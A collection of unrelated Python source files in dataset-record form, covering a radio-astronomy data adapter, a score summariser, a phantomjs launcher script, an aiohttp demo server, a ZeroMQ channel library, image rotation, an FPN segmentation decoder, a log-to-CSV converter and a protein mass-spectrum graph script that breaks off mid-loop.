cp_argsort[::nstokes]\n\n # Take baseline products so that we don't recompute\n # UVW coordinates for all correlator products\n bl_products = corr_products.reshape(-1, nstokes)[:, 0]\n nbl, = bl_products.shape\n\n # AIPS baseline IDs\n aips_baselines = np.asarray([bp.aips_bl_ix for bp in bl_products],\n dtype=np.float32)\n\n # Get the AIPS visibility data shape (inaxes)\n # reverse to go from FORTRAN to C ordering\n fits_desc = kat_adapter.fits_descriptor()\n inaxes = tuple(reversed(fits_desc['inaxes'][:fits_desc['naxis']]))\n\n _, nchan, ncorrprods = kat_adapter.shape\n\n out_vis_size = 
kat_adapter.uv_vis.dtype.itemsize\n out_vis_shape = (time_step, nbl, nchan, nstokes, 3)\n vis_size_estimate = np.product(out_vis_shape, dtype=np.int64)*out_vis_size\n\n EIGHT_GB = 8*1024**3\n\n if vis_size_estimate > EIGHT_GB:\n log.warning(\"Visibility chunk '%s' is greater than '%s'. \"\n \"Check that sufficient memory is available\",\n fmt_bytes(vis_size_estimate), fmt_bytes(EIGHT_GB))\n\n # Get some memory to hold reorganised visibilities\n out_vis = np.empty(out_vis_shape, dtype=kat_adapter.uv_vis.dtype)\n\n def _get_data(time_start, time_end):\n \"\"\"\n Retrieve data for the given time index range.\n\n Parameters\n ----------\n time_start : integer\n Start time index for this scan\n time_end : integer\n Ending time index for this scan\n\n Returns\n -------\n u : np.ndarray\n AIPS baseline U coordinates\n v : np.ndarray\n AIPS baseline V coordinates\n w : np.ndarray\n AIPS baseline W coordinates\n time : np.ndarray\n AIPS timestamps\n baselines : np.ndarray\n AIPS baseline IDs\n vis : np.ndarray\n AIPS visibilities\n \"\"\"\n ntime = time_end - time_start\n\n # Retrieve scan data (ntime, nchan, nbl*nstokes)\n # nbl*nstokes is all mixed up at this point\n aips_time = kat_adapter.uv_timestamps[time_start:time_end]\n aips_vis = kat_adapter.uv_vis[time_start:time_end]\n aips_u = kat_adapter.uv_u[time_start:time_end]\n aips_v = kat_adapter.uv_v[time_start:time_end]\n aips_w = kat_adapter.uv_w[time_start:time_end]\n\n # Check dimension shapes\n assert aips_vis.dtype == np.float32\n assert aips_time.dtype == np.float64\n assert aips_u.dtype == np.float64\n assert aips_v.dtype == np.float64\n assert aips_w.dtype == np.float64\n assert (ntime,) == aips_time.shape\n assert (ntime, nchan, ncorrprods, 3) == aips_vis.shape\n assert (ntime, ncorrprods) == aips_u.shape\n assert (ntime, ncorrprods) == aips_v.shape\n assert (ntime, ncorrprods) == aips_w.shape\n\n # Reorganise correlation product dim of aips_vis so that\n # correlations are grouped into nstokes per baseline and\n # baselines are in increasing order.\n aips_vis = _reorganise_product(aips_vis, cp_argsort.reshape(nbl, nstokes), out_vis[:ntime])\n\n # Reshape to include the full AIPS UV inaxes shape,\n # including singleton ra and dec dimensions.\n # Note that reshape returns a new view, so assign the result.\n aips_vis = aips_vis.reshape((ntime, nbl) + inaxes)\n\n # Select UVW coordinate of each baseline\n aips_u = aips_u[:, bl_argsort]\n aips_v = aips_v[:, bl_argsort]\n aips_w = aips_w[:, bl_argsort]\n\n assert aips_u.shape == (ntime, nbl)\n assert aips_v.shape == (ntime, nbl)\n assert aips_w.shape == (ntime, nbl)\n\n # Yield this scan's data\n return (aips_u, aips_v, aips_w,\n aips_time, aips_baselines,\n aips_vis)\n\n # Iterate through scans\n for si, state, target in kat_adapter.scans():\n ntime = kat_adapter.shape[0]\n\n # Create a generator returning data\n # associated with chunks of time data.\n data_gen = (_get_data(ts, min(ts+time_step, ntime)) for ts\n in range(0, ntime, time_step))\n\n # Yield scan variables and the generator\n yield si, state, target, data_gen\n\n\n@numba.jit(nopython=True, parallel=True)\ndef _reorganise_product(vis, cp_argsort, out_vis):\n \"\"\" Reorganise correlation product dim of vis so that\n correlations are grouped as given in cp_argsort.\n\n Parameters\n ----------\n vis : np.ndarray\n Input array of visibilities and weights.\n Shape: (ntime, nchan, nproducts, 3)\n where nproducts is the number of correlation products\n (i.e. nbaselines*nstokes). 
The last axis holds\n (real_vis, imag_vis, weight).\n cp_argsort : np.ndarray\n 2D array of indices to the 3rd axis of vis that are\n grouped into increasing AIPS baseline order and the\n Stokes order required of AIPS UV.\n Shape: (nbaselines, nstokes)\n out_vis : np.ndarray\n Output array to store reorganised visibilities in\n AIPS UV order.\n Shape: (ntime, nbaselines, nchan, nstokes, 3)\n\n Returns\n -------\n out_vis : np.ndarray\n \"\"\"\n n_time = vis.shape[0]\n n_chan = vis.shape[1]\n n_bl = cp_argsort.shape[0]\n n_stok = cp_argsort.shape[1]\n for tm in range(n_time):\n bstep = 128\n bblocks = (n_bl + bstep - 1) // bstep\n for bblock in numba.prange(bblocks):\n bstart = bblock * bstep\n bstop = min(n_bl, bstart + bstep)\n for prod in range(bstart, bstop):\n in_cp = cp_argsort[prod]\n for stok in range(n_stok):\n in_stok = in_cp[stok]\n for chan in range(n_chan):\n out_vis[tm, prod, chan, stok] = vis[tm, chan, in_stok]\n return out_vis\n","sub_path":"katacomb/katacomb/katdal_adapter.py","file_name":"katdal_adapter.py","file_ext":"py","file_size_in_byte":41345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249732034","text":"# This script summarizes the scores from the weekly evaluations\n\n# Potential additions:\n# Get weekly totals\n# Get totals by forecast type and bonus points\n# Condense the bonus points for each week into one column\n# Calculate ranks and write this out\n\n# %%\nimport pandas as pd\nimport numpy as np\nimport os\n\n# %%\n# User variables\nforecast_num = 2\n\n# %%\n# Setup the scoreboard\nnames = ['name1', 'name2', 'name3']\nnstudent = len(names)\nscoreboard=pd.DataFrame({'total': np.zeros(nstudent)}, index=names)\n\n# %%\n# Read in the weekly forecasts\nfor i in range(1, forecast_num+1):\n print(i)\n # read and add the 1 week forecast\n filename = '1week_forecast' + str(i) + '.csv'\n filepath = os.path.join('..', 'weekly_results', filename)\n if os.path.exists(filepath):\n print(filepath)\n temp = pd.read_csv(filepath, index_col='name')\n label='_F'+str(i)+'W1'\n temp=temp.rename(columns={'points':'points'+label, 'bonus_points': 'bonus'+label})\n scoreboard = pd.merge(left=scoreboard, right=temp[['points'+label, 'bonus'+label]], \n left_index=True, right_index=True)\n \n # read and add the 2 week forecast\n filename = '2week_forecast' + str(i) + '.csv'\n filepath = os.path.join('..', 'weekly_results', filename)\n if os.path.exists(filepath):\n print(filepath)\n temp = pd.read_csv(filepath, index_col='name')\n label='_F'+str(i)+'W2'\n temp=temp.rename(columns={'points':'points'+label, 'bonus_points': 'bonus'+label})\n scoreboard = pd.merge(left=scoreboard, right=temp[['points'+label, 'bonus'+label]], \n left_index=True, right_index=True)\n\n\n# %%\nscoreboard['total']=scoreboard.sum(axis=1)\n# technically this would be a more correct way to do this\n# scoreboard.loc[:, scoreboard.columns != 'total'].sum(axis=1)\n\n# Write out the results\nfilepath_out = os.path.join('..', 'scoreboard.csv')\nscoreboard.to_csv(filepath_out, index_label='name')\n\n# %%\n","sub_path":"evaluation_scripts/archive/Summarzie_Scores.py","file_name":"Summarzie_Scores.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304020754","text":"import os\nimport threading\nimport time\n\nclass mythread(threading.Thread):\n\tdef __init__(self,command):\n\t\tthreading.Thread.__init__(self)\n\t\tself.command=command\n\tdef run(self):\n\t\tos.system(self.command)\n\n# Launch one phantomjs worker per line of aa.txt\nfor line in open(\"aa.txt\",\"r\"):\n\tcommand='phantomjs aa.js %s' % line\n\t# print(command)\n\tmy_thread=mythread(command)\n\tmy_thread.start()\n\ttime.sleep(10)\n\t","sub_path":"python/刷商务通/bb.py","file_name":"bb.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"256817648","text":"import gzip\nimport json\nimport sys\nimport csv\n\n\n\n# check if a file argument was passed\nif len(sys.argv) == 1:\n\t\tprint(' [*] please specify *.gz file e.g.\\npython app.py test.json.gz')\n\t\tsys.exit(1)\n\n# extract file from zipped format\nwith gzip.open(sys.argv[1], 'r') as in_file:\n\t\ts = in_file.read()\n\n# check if string is json\ntry:\n\t\t\theaders = ['android_sdk_version', 'android_version', 'device_model', 'device_name',\n\t\t\t\t\t\t\t 'device_oem', 'sender_package', 'sender_version_code', 'sender_version_name',\n\t\t\t\t\t\t\t 'cid', 'event', 'priority', 'car.computedDistance', 'car.rpm', 'car.measuredDistance',\n\t\t\t\t\t\t\t 'device.carrierId', 'device.batteryCharge', 'device.networkRoaming', 'car.coolantTemperature',\n\t\t\t\t\t\t\t 'car.vin', 'device.charging', 'device.carrierName', 'device.networkType','obd.vin',\n\t\t\t\t\t\t\t 'gps.longitude','gps.provider','gps.latitude','gps.accuracy','gps.altitude','gps.speed','gps.bearing',\n\t\t\t\t\t\t\t 'car.speed', 'device.locale', 'device.localTimestamp', 'car.measuredFuelLevel','obd.massAirFlow',\n\t\t\t\t\t\t\t 'obd.fuelLevel','obd.moduleVoltage','obd.distanceSinceCCC','obd.load','obd.consumptionRate','obd.ambientAirTemperature',\n\t\t\t\t\t\t\t 'obd.throttlePosition','obd.oilTemp','tripId', 'obd.engineRuntime','car.fuelRate',\n\t\t\t\t\t\t\t 'car.engineRuntime', 'device.androidId', 'timestamp','android_id','device_available_disk_space',\n\t\t\t\t\t\t\t 'device_battery','device_carrier_id','device_carrier_name','device_charging','device_geoip_city','device_geoip_country',\n\t\t\t\t\t\t\t 'device_geoip_subdivision','device_local_ts','device_locale','device_network_roaming','device_network_type',\n\t\t\t\t\t\t\t 'version'\n\t\t\t\t\t\t\t]\n\t\t\tflat_data = []\n\t\t\tfor line in s.decode().split('\\n'):\n\t\t\t\tif line:\n\t\t\t\t\t\tjson_data = json.loads(line)\n\t\t\t\t\t\tfor grp in json_data['groups']:\n\t\t\t\t\t\t\t\tfor dis in grp['distinct']:\n\t\t\t\t\t\t\t\t\t\tdta = grp['common']\n\t\t\t\t\t\t\t\t\t\tdta['version'] = json_data['version']\n\n\t\t\t\t\t\t\t\t\t\t# add tags dict\n\t\t\t\t\t\t\t\t\t\tdistinct_data = dis.pop('tags', None)\n\t\t\t\t\t\t\t\t\t\tnew_dta = dict(dta, **distinct_data)\n\n\t\t\t\t\t\t\t\t\t\t# add distinct dict\n\t\t\t\t\t\t\t\t\t\tnew_dta = dict(new_dta, **dis)\n\t\t\t\t\t\t\t\t\t\tflat_data.append(new_dta)\n\n\t\t# write to csv file\n\t\t\tmyfile = open(sys.argv[1].replace('.gz', '') + '.csv', 'w')\n\t\t\twr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n\t\t\twr.writerow(headers)\n\n\t\t\tfor d in flat_data:\n\t\t\t\t\t\tdata = []\n\t\t\t\t\t\tfor x in headers:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\tdata.append(d[x])\n\t\t\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\t\t\t\td[x] = 'NULL'\n\t\t\t\t\t\t\t\t\tdata.append(d[x])\n\t\t\t\t\t\twr.writerow(data)\n\n\nexcept json.decoder.JSONDecodeError as j:\n\t\tprint(' [/] file not detected as json, skipping json processing 
...')\n\n","sub_path":"LogParser.py","file_name":"LogParser.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"555775501","text":"# Set up logging output\nimport logging; logging.basicConfig(level=logging.INFO)\n\n\n# Asynchronous IO framework\nimport asyncio\n# Asynchronous HTTP framework\nfrom aiohttp import web\n\n\ndef hello(request):\n\treturn web.Response(body=b'
<h1>Hello World</h1>
', content_type='text/html')\n\n\n@asyncio.coroutine\ndef init(loop):\n\tapp = web.Application(loop=loop)\n\tapp.router.add_route('GET', '/', hello)\n\tsrv = yield from loop.create_server(app.make_handler(), '127.0.0.1', 9090)\n\tlogging.info(\"server started at http://127.0.0.1:9090\")\n\treturn srv\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(init(loop))\nloop.run_forever()","sub_path":"www/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585158941","text":"# -*- coding:utf-8 -*-\nimport gevent\n\nfrom corgi import random\nfrom corgi.zeromq import zmq, ctx\n\n\nclass Poller(object):\n def __init__(self, channels):\n self.poller = zmq.Poller()\n self.polled_channels = []\n self.quit_c = Channel()\n self.register(self.quit_c)\n for c in channels:\n self.register(c)\n self.is_active = True\n\n def register(self, channel):\n if channel in self.polled_channels:\n return\n self.polled_channels.append(channel)\n self.poller.register(channel.recv_socket, zmq.POLLIN)\n\n def unregister(self, channel):\n self.poller.unregister(channel.recv_socket)\n self.polled_channels.remove(channel)\n\n def quit(self):\n self.quit_c.send('')\n\n def poll(self, timeout=None):\n assert self.is_active is True\n sockets = dict(self.poller.poll(timeout))\n if not sockets:\n return [(None, None)]\n res = []\n for c in [channel for channel in self.polled_channels if channel.recv_socket in sockets.keys()]:\n if c is self.quit_c:\n self.is_active = False\n continue\n res.append((c, sockets[c.recv_socket]))\n return res\n\n\nclass RecvPoller(Poller):\n def poll(self, timeout=None):\n result = []\n for c, s in super(RecvPoller, self).poll(timeout):\n if c is None:\n return [(None, None, None)]\n msg = c.recv()\n result.append((c, s, msg))\n return result\n\n\nclass Channel(object):\n def __init__(self, addr=None):\n if addr is None:\n addr = '://'.join(['inproc', random.random_uuid()])\n self.addr = addr\n self.send_socket = ctx.socket(zmq.PAIR)\n self.recv_socket = ctx.socket(zmq.PAIR)\n self.send_socket.connect(self.addr)\n self.recv_socket.bind(self.addr)\n\n def send(self, msg):\n self.send_socket.send_string(msg)\n\n # recv blocks while there is no message\n # Messages sent on the channel before recv is called are not lost; they are received one by one once the channel starts recv\n def recv(self):\n return self.recv_socket.recv_string()\n\n def __eq__(self, other):\n if hasattr(self, 'addr') and hasattr(other, 'addr') and self.addr == other.addr:\n return True\n return False\n\n @property\n def closed(self):\n return self.send_socket.closed or self.recv_socket.closed\n\n def close(self):\n self.send_socket.close()\n self.recv_socket.close()\n\n\nclass Transfer(object):\n def __init__(self):\n self.poller = None\n self.polling = False\n self.quit_c = Channel()\n self.pipelines = []\n\n def add(self, in_c, out_c):\n assert isinstance(in_c, Channel)\n assert isinstance(out_c, Channel)\n self.pipelines.append({'in': in_c,\n 'out': out_c})\n if self.polling:\n self.poller.register(in_c)\n\n def remove(self, in_c, out_c=None):\n assert isinstance(in_c, Channel)\n removed_pipelines = []\n for e in self.pipelines:\n if e['in'] != in_c:\n continue\n if out_c is None or e['out'] == out_c:\n removed_pipelines.append(e)\n for rp in removed_pipelines:\n self.pipelines.remove(rp)\n if in_c not in [e['in'] for e in self.pipelines] and self.polling:\n self.poller.unregister(in_c)\n\n def start(self):\n def _run():\n self.poller = RecvPoller([e['in'] for e in self.pipelines] + 
[self.quit_c])\n self.polling = True\n while self.polling:\n for c, s, m in self.poller.poll():\n if c is self.quit_c:\n self.polling = False\n self.poller = None\n # self.pipelines.clear()\n break\n for p in self.pipelines:\n if p['in'] == c:\n p['out'].send(m)\n\n gevent.spawn(_run)\n gevent.sleep(0)\n\n","sub_path":"corgi/channel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"452035078","text":"import numpy as np\n\n\ndef rotate_image(img, rot_num=1):\n \"\"\"\n rotates the image counterclockwise for a\n given number of rotations like np.rot90(img)\n\n Parameters\n ----------\n img : numpy.ndarray\n A numpy array representing the image.\n rot_num : int\n An integer determining the number of rotations.\n\n Returns\n -------\n numpy.ndarray\n The rotated image.\n\n Examples\n --------\n >>> from paniz_image import paniz_image\n >>> import numpy as np\n >>> image = np.arange(18).reshape(3,2,3)\n >>> paniz_image.rotate_image(image, 6)\n array([[[15, 16, 17],\n [12, 13, 14]],\n\n [[ 9, 10, 11],\n [ 6, 7, 8]],\n\n [[ 3, 4, 5],\n [ 0, 1, 2]]])\n \"\"\"\n # Handling errors:\n if type(rot_num) != int:\n raise TypeError(\"Number of rotations has to be an integer!\")\n if type(img) != np.ndarray:\n raise TypeError(\"Please pass a numpy array representing an image!\")\n if len(img.shape) not in {2, 3}:\n raise ValueError(\"Your image should have 2 or 3 dimensions!\")\n\n # For a colored image:\n if len(img.shape) == 3:\n if rot_num == 0:\n return img\n else:\n img = np.vstack(\n ([img[:, i, :] for i in range(img.shape[1] - 1, -1, -1)])\n ).reshape(img.shape[1], img.shape[0], img.shape[2])\n return rotate_image(img, rot_num - 1)\n # For a black and white image:\n else:\n if rot_num == 0:\n return img\n else:\n img = np.vstack(\n ([img[:, i] for i in range(img.shape[1] - 1, -1, -1)])\n ).reshape(img.shape[1], img.shape[0])\n return rotate_image(img, rot_num - 1)\n","sub_path":"src/paniz_image/paniz_image.py","file_name":"paniz_image.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"190007133","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..base.model import Model\n\n\nclass Conv3x3GNReLU(nn.Module):\n def __init__(self, in_channels, out_channels, upsample=False):\n\n super().__init__()\n self.upsample = upsample\n self.block = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, (3, 3),\n stride=1, padding=1, bias=False),\n nn.GroupNorm(32, out_channels),\n nn.ReLU(inplace=True),\n )\n\n def forward(self, x):\n x = self.block(x)\n if self.upsample:\n x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=True)\n return x\n\n\nclass FPNBlockAttG(nn.Module):\n def __init__(self, F_g, F_l, F_int):\n super().__init__()\n self.W_g = nn.Sequential(\n nn.Conv2d(F_g, F_int, kernel_size=1, stride=1, padding=0, bias=True),\n nn.BatchNorm2d(F_int)\n )\n\n self.W_x = nn.Sequential(\n nn.Conv2d(F_l, F_int, kernel_size=1, stride=1, padding=0, bias=True),\n nn.BatchNorm2d(F_int)\n )\n\n self.psi = nn.Sequential(\n nn.Conv2d(F_int, 1, kernel_size=1, stride=1, padding=0, bias=True),\n nn.BatchNorm2d(1),\n nn.Sigmoid()\n )\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x, g = x\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n\n g1 = self.W_g(g)\n x1 = self.W_x(x)\n psi = self.relu(g1 + x1)\n psi = 
self.psi(psi)\n return x1 * psi + x\n\n\nclass FPNBlock(nn.Module):\n def __init__(self, pyramid_channels, skip_channels):\n super().__init__()\n self.skip_conv = nn.Conv2d(skip_channels, pyramid_channels, kernel_size=1)\n\n def forward(self, x):\n x, skip = x\n\n x = F.interpolate(x, scale_factor=2, mode='nearest')\n skip = self.skip_conv(skip)\n\n x = x + skip\n return x\n\n\nclass SegmentationBlock(nn.Module):\n def __init__(self, in_channels, out_channels, n_upsamples=0):\n super().__init__()\n\n blocks = [\n Conv3x3GNReLU(in_channels, out_channels, upsample=bool(n_upsamples))\n ]\n\n if n_upsamples > 1:\n for _ in range(1, n_upsamples):\n blocks.append(Conv3x3GNReLU(out_channels, out_channels, upsample=True))\n\n self.block = nn.Sequential(*blocks)\n\n def forward(self, x):\n return self.block(x)\n\n\nclass SupervisionBlock(nn.Module):\n def __init__(self, in_channels, out_channels, final_channels):\n super().__init__()\n\n blocks = [Conv3x3GNReLU(in_channels, out_channels, upsample=True),\n nn.Conv2d(out_channels, final_channels, kernel_size=1, padding=0)]\n self.block = nn.Sequential(*blocks)\n\n def forward(self, x):\n return self.block(x)\n\n\nclass FPNDecoder(Model):\n\n def __init__(\n self,\n encoder_channels,\n pyramid_channels=256,\n segmentation_channels=128,\n final_upsampling=4,\n final_channels=1,\n hypercolumn=False,\n supervision=False,\n attentionGate=False,\n dropout=0.2,\n ):\n super().__init__()\n self.final_upsampling = final_upsampling\n self.hypercolumn = hypercolumn\n self.supervision = supervision\n\n if attentionGate:\n print(\"Use attention\")\n self.conv1 = nn.Conv2d(encoder_channels[0], pyramid_channels, kernel_size=(1, 1))\n self.p4 = FPNBlockAttG(encoder_channels[1], pyramid_channels, pyramid_channels)\n self.p3 = FPNBlockAttG(encoder_channels[2], pyramid_channels, pyramid_channels)\n self.p2 = FPNBlockAttG(encoder_channels[3], pyramid_channels, pyramid_channels)\n\n else:\n self.conv1 = nn.Conv2d(encoder_channels[0], pyramid_channels, kernel_size=(1, 1))\n self.p4 = FPNBlock(pyramid_channels, encoder_channels[1])\n self.p3 = FPNBlock(pyramid_channels, encoder_channels[2])\n self.p2 = FPNBlock(pyramid_channels, encoder_channels[3])\n\n self.s5 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=3)\n self.s4 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=2)\n self.s3 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=1)\n self.s2 = SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=0)\n\n self.dropout = nn.Dropout2d(p=dropout, inplace=True)\n last_conv_channels = segmentation_channels*4 if self.hypercolumn else segmentation_channels\n self.final_conv = nn.Conv2d(last_conv_channels, final_channels, kernel_size=1, padding=0)\n\n self.initialize()\n\n def forward(self, x):\n c5, c4, c3, c2, _ = x\n\n p5 = self.conv1(c5)\n p4 = self.p4([p5, c4])\n p3 = self.p3([p4, c3])\n p2 = self.p2([p3, c2])\n\n s5 = self.s5(p5)\n s4 = self.s4(p4)\n s3 = self.s3(p3)\n s2 = self.s2(p2)\n\n if self.hypercolumn:\n x = torch.cat([s5, s4, s3, s2], dim=1)\n else:\n x = s5 + s4 + s3 + s2\n\n x = self.dropout(x)\n x = self.final_conv(x)\n\n if self.final_upsampling is not None and self.final_upsampling > 1:\n x = F.interpolate(x, scale_factor=self.final_upsampling, mode='bilinear', align_corners=True)\n\n return 
x\n","sub_path":"src/models/segmentation_models_pytorch_danil/fpn/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536340402","text":"try:\r\n\timport pygraphviz as pgv\r\nexcept:\r\n\tpass\r\nfrom collections import defaultdict\r\nfrom copy import deepcopy\r\n\r\nclass OneSquare(object):\r\n\t\"\"\"One square with four nodes of peptide and two pairs of same amino acid\r\n\t\tA -a-> aA\r\n\t\t: :\r\n\t\tb b\r\n\t\t: :\r\n\t\tAb -a-> aAb\"\"\"\r\n\tdef __init__(self, pairs):\r\n\t\tsuper(OneSquare, self).__init__()\r\n\t\tself.n0 = pairs[0]\r\n\t\tself.a1 = pairs[1]\r\n\t\tself.a2 = pairs[2]\r\n\t\tself.n1 = pairs[3]\r\n\t\tself.n2 = pairs[4]\r\n\t\tself.n3 = pairs[5]\r\n\t\tself.right = []\r\n\t\tself.left = []\r\n\t\tself.up = []\r\n\t\tself.down = []\t\r\n\t\tself.diag = []\r\n\r\n\tdef detail(self, PRINT = True, COMPACT = False):\r\n\t\tif COMPACT:\r\n\t\t\tstring = '%s, %s\\n%s, %s\\n%s, %s' % (self.n0, self.n1, self.n2, self.n3, self.a1, self.a2)\r\n\t\telse:\r\n\t\t\tstring = '%s\\t-%s->\\t%s\\n | \\t\\t\\t |\\n %s \\t\\t\\t %s\\n | \\t\\t\\t |\\n%s\\t-%s->\\t%s' %\\\r\n\t\t\t\t(self.n0, self.a1, self.n1, self.a2, self.a2, self.n2, self.a1, self.n3)\r\n\t\tif PRINT:\r\n\t\t\tprint(string + '\\n')\r\n\t\treturn string\r\n\r\n\tdef trans(self):\r\n\t\tpairs = [self.n0, self.a2, self.a1, self.n2, self.n1, self.n3]\r\n\t\treturn OneSquare(pairs)\r\n\r\ndef Function0(err = 0.3, tablefull = False):\r\n\te_spec = list(map(lambda x: eval(x), '371.5 375.4 390.4 392.2 409.0 420.2 427.2 443.3 446.4 461.3 471.4 477.4 491.3 505.3 506.4 519.2 536.1 546.5 553.3 562.3 588.2 600.3 616.2 617.4 618.3 633.4 634.4 636.2 651.5 652.4 702.5 703.4 712.5 718.3 721.0 730.3 749.4 762.6 763.4 764.4 779.6 780.4 781.4 782.4 797.3 862.4 876.4 877.4 878.6 879.4 893.4 894.4 895.4 896.5 927.4 944.4 975.5 976.5 977.4 979.4 1005.5 1007.5 1022.5 1023.7 1024.5 1039.5 1040.3 1042.5 1043.4 1057.5 1119.6 1120.6 1137.6 1138.6 1139.5 1156.5 1157.6 1168.6 1171.6 1185.4 1220.6 1222.5 1223.6 1239.6 1240.6 1250.5 1256.5 1266.5 1267.5 1268.6'.split(' ')))\r\n\tif tablefull == True:\r\n\t\tmasstable = [57, 71, 87, 97, 99, 101, 103, 113, 114, 115, 128, 129, 131, 132, 137, 147, 156, 163, 186]\r\n\telse:\r\n\t\tmasstable = [99, 128, 113, 147, 97, 186, 114, 163]\r\n\tlenth = len(e_spec)\r\n\taanum = len(masstable)\r\n\tfw = open('ProteinNode.txt', 'w')\r\n\tfor idx1 in range(lenth):\r\n\t\ttarget = e_spec[idx1]\r\n\t\tcnt = 0\r\n\t\tfor i in range(aanum):\r\n\t\t\ttarget2 = target + masstable[i]\r\n\t\t\tfor idx2 in range(idx1 + 1, lenth):\r\n\t\t\t\tspecnum = e_spec[idx2]\r\n\t\t\t\tif target2 > specnum - err and target2 < specnum + err:\r\n\t\t\t\t\tfw.write('%.1f\\t%d\\t%.1f\\n' % (target, masstable[i], specnum))\r\n\t\t\t\t\tcnt += 1\r\n\tfw.close()\r\n\tprint(\"\\n\\n\\n\\nProteinNode.txt has been changed, with %.1f err and %s table.\" % \\\r\n\t\t(err, 'FULL' if tablefull == True else 'PARTIAL'))\r\n\tprint('You can set err using the first parameter,')\r\n\tprint('and choose full table (True) or partial table (False) using the second parameter.\\n\\n\\n')\r\n\r\ndef Function1():\r\n\tnodesset = set()\r\n\tnodes = defaultdict(list)\r\n\tf = open('ProteinNode.txt')\r\n\tfor l in f:\r\n\t\tl = l.rstrip().split('\\t')\r\n\t\tnodes[l[0]].append(l[-1])\r\n\t\tnodesset.add(l[0])\r\n\t\tnodesset.add(l[-1])\r\n\tf.close()\r\n\ttry:\r\n\t\tg = pgv.AGraph()\r\n\t\tfor key in 
nodesset:\r\n\t\t\tg.add_node(key)\r\n\t\tfor key in nodes:\r\n\t\t\tfor value in nodes[key]:\r\n\t\t\t\tg.add_edge(key, value)\r\n\t\tg.layout()\r\n\t\tg.draw('NodesTree.png')\r\n\texcept:\r\n\t\tprint('\\n\\n\\n\\n\\nPlease run in Linux-Bioinformatics\\n\\n\\n\\n\\n')\r\n\r\ndef Function2(WRITE = True):\r\n\tnodes = defaultdict(dict)\r\n\tf = open('ProteinNode.txt')\r\n\tfor l in f:\r\n\t\tl = l.rstrip().split('\\t')\r\n\t\tnodes[l[0]][l[1]] = l[-1]\r\n\tstorelist = []\r\n\texist = set()\r\n\tnodes = dict(nodes)\r\n\tfor pep in nodes:\r\n\t\tfor key1 in nodes[pep]:\r\n\t\t\tpep1 = nodes[pep][key1]\r\n\t\t\tif pep1 not in nodes:\r\n\t\t\t\tcontinue\r\n\t\t\tfor key2 in nodes[pep1]:\r\n\t\t\t\tif key2 == key1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tpep3 = nodes[pep1][key2]\r\n\t\t\t\tif key2 not in nodes[pep]:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tpep2 = nodes[pep][key2]\r\n\t\t\t\tif pep2 not in nodes:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif key1 not in nodes[pep2]:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tpep4 = nodes[pep2][key1]\r\n\t\t\t\tif pep3 == pep4:\r\n\t\t\t\t\tls = [pep, key1, key2, pep1, pep2, pep3]\r\n\t\t\t\t\tstring = ','.join(sorted(ls))\r\n\t\t\t\t\tif string not in exist:\r\n\t\t\t\t\t\texist.add(string)\r\n\t\t\t\t\t\tstorelist.append(ls)\r\n\tif WRITE:\r\n\t\tfw = open('ProteinNode2.txt', 'w')\r\n\t\tfor x in storelist:\r\n\t\t\tfw.write(','.join(x) + '\\n')\r\n\t\tfw.close()\r\n\treturn storelist\r\n\r\ndef Function3():\r\n\tstorelist = Function2(False)\r\n\tsetnet = set()\r\n\tnets = []\r\n\tfor peps1 in storelist:\r\n\t\tfor peps2 in storelist:\r\n\t\t\tif peps1[0] == peps2[0]:\r\n\t\t\t\tcontinue\r\n\t\t\tif peps1[3] in peps2 and peps1[4] not in peps2:\r\n\t\t\t\tsamenode = peps1[3]\r\n\t\t\telif peps1[3] not in peps2 and peps1[4] in peps2:\r\n\t\t\t\tsamenode = peps1[4]\r\n\t\t\telse:\r\n\t\t\t\tcontinue\r\n\t\t\tfor peps in storelist:\r\n\t\t\t\tif peps[0] != samenode:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif (peps[3] == peps1[-1] and peps[4] == peps2[-1]) or \\\r\n\t\t\t\t\t(peps[4] == peps1[-1] and peps[3] == peps2[-1]):\r\n\t\t\t\t\tls = [peps1[0], peps2[0], peps1[3], peps1[4], peps2[3], peps2[4], samenode, peps1[-1], peps2[-1], peps[-1]]\r\n\t\t\t\t\tif tuple(sorted(ls)) not in setnet:\r\n\t\t\t\t\t\tsetnet.add(tuple(sorted(ls)))\r\n\t\t\t\t\t\tnets.append(ls)\r\n\tfor net in sorted(nets):\r\n\t\tpart = net[2:6]\r\n\t\tfor i in range(len(part)):\r\n\t\t\tif i in (0, 1) and part[i] != net[6]:\r\n\t\t\t\tnode1 = part[i]\r\n\t\t\telif i in (2, 3) and 